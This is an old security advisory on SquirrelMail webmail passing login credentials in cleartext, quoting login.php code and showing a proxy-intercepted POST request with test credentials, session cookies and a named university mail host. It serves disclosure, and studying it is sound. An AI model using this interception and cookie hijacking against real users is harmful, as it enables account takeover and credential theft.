-=[Cookie Hijacking in Squirrelmail]=- ======================================= Triosec , SecNiche Security This abstract will present you a typical weakness that persist in supplying credentials through squirremail program. It has been noticed that the credentials are passed as clear text on the LAN when ever a user try to login into account via squirrelmail. Many people talked to me regarding this and stolen passwords of their account on the Local Area Network. This occurs due to :- 1. Cookie hijacking. 2. Clear Text passwords. This is because the squirrelmail sends a password in clear text over the wire and can be traced very easily by the attacker. Lets look into the implementation code: -=[Login,php code from Squirrelmail]=- ======================================= if ( !empty($_SESSION['session_expired_post']) && !empty($_SESSION['session_expired_location']) ) { $sep = $_SESSION['session_expired_post']; $sel = $_SESSION['session_expired_location']; sqsession_destroy(); sqsession_is_active(); sqsession_register($sep, 'session_expired_post'); sqsession_register($sel, 'session_expired_location'); } else { sqsession_destroy(); } do_hook('login_cookie'); $loginname_value = (sqGetGlobalVar('loginname', $loginname) ? htmlspecialchars($loginname) : '') addInput($username_form_name, $loginname_value), addPwField($password_form_name). addHidden('js_autodetect_results', SMPREF_JS_OFF). if(sqgetGlobalVar('mailtodata', $mailtodata)) { $mailtofield = addHidden('mailtodata', $mailtodata); } else { $mailtofield = ''; } The code does not provide any specific digest functions that is applied before passing credentials to the destination server for accessing accounts. This really clear up the concept regarding the implementation layout of credentials in squirremail. -=[ Testing ]=- ================== Lets perform a penetration testing step. I load Odysessus proxy interceptor to play a one step ahead with it. I supplied : username : User_Penetration Password : Pass_Penetration The String undertaken as: login_username=User_Penetration&secretkey=Pass_Penetration& js_autodetect_results=1&just_logged_in=1&button=Login The hijacked HTTP request : POST /nutsmail/src/redirect.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://webmail.iiita.ac.in/nutsmail/src/login.php Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: webmail.iiita.ac.in Content-Length: 112 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: user=VWgOYQVwVGJTZAk4BjRXYA5mVDQ%3D; SQMSESSID=86f3311f159ace64f4439600aba6f526 login_username=User_Penetration&secretkey=Pass_Penetration& js_autodetect_results=1&just_logged_in=1&button=Login So without any difficulty you can see the credentials travelling across wire. So without much efforts the cookie can be hijacked on the wire. ===== Zknk